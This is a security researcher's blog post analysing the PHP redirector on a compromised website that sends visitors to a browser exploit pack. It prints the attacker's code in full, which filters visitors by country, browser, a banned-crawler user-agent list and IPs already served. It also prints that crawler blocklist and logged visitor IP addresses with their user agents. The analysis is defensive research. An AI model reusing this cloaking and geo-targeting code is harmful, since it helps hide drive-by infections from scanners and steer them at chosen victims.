Sunday, February 22, 2015

A Case Study of Geo-location Filtering and Dedicated Malware Infections !

It is a wide-known fact that the majority of infectious code (iframe redirecting to browser exploit packs) is hosted on free domains or compromised websites that are sold in the underground community. In my earlier presentation at Virus Bulletin Conference (HERE), I discussed about the IP Address Logging Detection Trick (IPLDT) which basically allows the attackers to restrict the spreading of malware to a dedicated audience on the Internet. For more about BEPs, read the previous research papers:


A simple work flow is discussed below:
  • User visits the website serving infectious code.
  • Infected website triggers the custom code hosted by attacker to check for the following:
    • Geo-location of the IP address: If Geo-location of the IP address of the end-user is found to be mapped to specific locations in the configuration file, the user's browser is redirected to BEP for exploitation.
    • Verifying whether the exploit-code has been served to this IP or not: If the database shows that IP has been served already, IP address of the end-user is filtered and BEP URL is not served. 
  • When the user browser lands on the BEP URL, a specific vulnerability in the browser (built-in components or plug-ins) is exploited to download malware.
In addition, filters are also added for various automated spiders to restrict the access to bots (spiders) to prevent the appearance of malicious website or links in the search results. Recently, I was analyzing a malicious website that was serving infectious code and redirects the user's browser to BEP to download malware by exploiting specific vulnerability. However, the name of the exploit kit is not  known. This analysis is more concentrated on the compromised website that performs redirection of the user's browser to the BEP.

A code snippet extracted from the infected webite is presented below. It clearly shows that the user-agent  and  IP Geo-location("CH" = Switzerland, "DE" = Germany) components are used for setting filters on the incoming HTTP traffic. Additionally, two files are generated for building databases for the IP addresses that are either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link of the BEP URL from the infected website.

 <?php  
 error_reporting(0); ini_set('display_errors',0);  
 function is_bot($myuagent, $myip) {  
      $uagents = file('uagents.txt',FILE_IGNORE_NEW_LINES);  
      $ips = file('ips.txt',FILE_IGNORE_NEW_LINES);  
      foreach ($uagents as $exp) {  
           if (preg_match('/'.$exp.'/i',$myuagent)) {  
                return true;  
           }  
      }  
      foreach ($ips as $exp) {  
           if (preg_match('/'.$exp.'/',$myip)) {  
                return true;  
           }  
      }  
      return false;  
 }  
   $countries = "CH;DE";  
   // no?aie?ea n nieiaoii  
   $good_link = "./banner.php";  
   // eaaay no?aie?ea  
   $bad_link = "./blabla.php";  
   //  
   $ip = $_SERVER['REMOTE_ADDR'];  
   $ua = $_SERVER['HTTP_USER_AGENT'];  
   $file = fopen("./sbase.txt","a+");  
   $file2 = fopen("./sbase_bad.txt","a+");  
   $already_showed = FALSE;  
   while (!feof($file)) {  
     $buffer = fgets($file);  
     $ip2 = $ip."\r\n";  
     if(strcmp($buffer,$ip2)==0) $already_showed = TRUE;  
   }  
   if (is_bot($_REQUEST['useragent'], $ip)) $already_showed = TRUE;  
   if($already_showed) {  
     include($bad_link);  
   } else {  
     require_once('./geoip/geoip.inc');  
     $gi = geoip_open("./geoip/GeoIP.dat",GEOIP_STANDARD);  
     $ccode = explode(";",$countries);  
     $show = FALSE;  
     foreach($ccode as $value) {  
       if(geoip_country_code_by_addr($gi,$ip) == $value && preg_match('/(msie|opera|firef)/i', $ua)) {  
         $show = TRUE;  
         fwrite($file,$ip."\r\n");  
       }  
     }  
     geoip_close($gi);  
     if($show) {  
       include($good_link);  
     } else {  
          fwrite($file2,$ip."|".$ua."\r\n");  
       include($bad_link);  
     }  
   }  
   fclose($file);  
 ?>  

On checking the stats of the two files, following stats were gathered:
  • Approximately 5881 unique IP addresses (users' browsers) were successfully redirected to the BEP.
  • Approximately 15737 unique IP addresses (users' browsers)  were restricted from visiting to the BEP.
The list of banned user-agents are shown below:

 Ask\s*Jeeves  
 HP\s*Web\s*PrintSmart  
 HTTrack  
 IDBot  
 Indy\s*Library#  
 ListChecker  
 MSIECrawler  
 NetCache  
 Nutch  
 RPT-HTTPClient  
 rulinki\.ru  
 Twiceler  
 WebAlta  
 Webster\s*Pro  
 www\.cys\.ru  
 Wysigot  
 Yahoo!\s*Slurp  
 Yeti  
 Accoona  
 CazoodleBot  
 CFNetwork  
 ConveraCrawlerDISCo  
 Download\s*Master  
 FAST\s*MetaWeb\s*Crawler  
 Flexum\s*spider  
 Gigabot  
 HTMLParser  
 ia_archiver  
 ichiro  
 IRLbot  
 Java  
 km\.ru\s*bot  
 kmSearchBot  
 libwww-perl  
 Lupa\.ru  
 LWP::Simple  
 lwp-trivial  
 Missigua  
 MJ12bot  
 msnbot  
 msnbot-media  
 Offline\s*Explorer  
 OmniExplorer_Bot  
 PEAR  
 psbot  
 Python  
 rulinki\.ru  
 SMILE  
 Speedy  
 Teleport\s*Pro  
 TurtleScanner  
 User-Agent  
 voyager  
 Webalta  
 WebCopier  
 WebData  
 WebZIP  
 Wget  
 Yandex  
 Yanga  
 Yeti  
 msnbot  
 spider  
 yahoo  
 jeeves  
 google  
 altavista  
 scooter  
 av\s*fetch  
 asterias  
 spiderthread revision  
 sqworm  
 ask  
 lycos.spider  
 infoseek sidewinder  
 ultraseek  
 polybot  
 webcrawler  
 robozill  
 gulliver  
 architextspider  
 yahoo!\s*slurp  
 charlotte  
 ngb  

A number of IP addresses with respective user-agent strings are presented below that were not allowed to load BEP URL in the browser for exploitation.

 77.120.162.20|Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16  
 77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko  
 194.124.140.39|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko  
 41.249.252.199|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko  
 213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36  
 46.126.65.93|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko  
 194.179.92.135|Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0  
 213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36  
 93.199.31.78|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; tb-webde/2.6.0; rv:11.0) like Gecko  
 77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko  
 188.63.105.11|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko  
 77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko  
 84.253.30.110|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko  
 194.179.92.135|Mozilla/4.0 (compatible;)  
 189.19.165.228|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36  
 66.102.6.183|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36  
 66.249.93.223|Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14  
 81.62.35.97|Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko  
 195.78.246.18|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36  

Inference: BEPs extensively use IPLDT to manage the infections and make the malicious code to be served to dedicated countries.

Sunday, February 8, 2015

Virus Bulletin Paper - Prosecting the Citadel botnet !

Virus Bulletin published earlier our research on Citadel. Check the links:

 Full PDF paper : https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf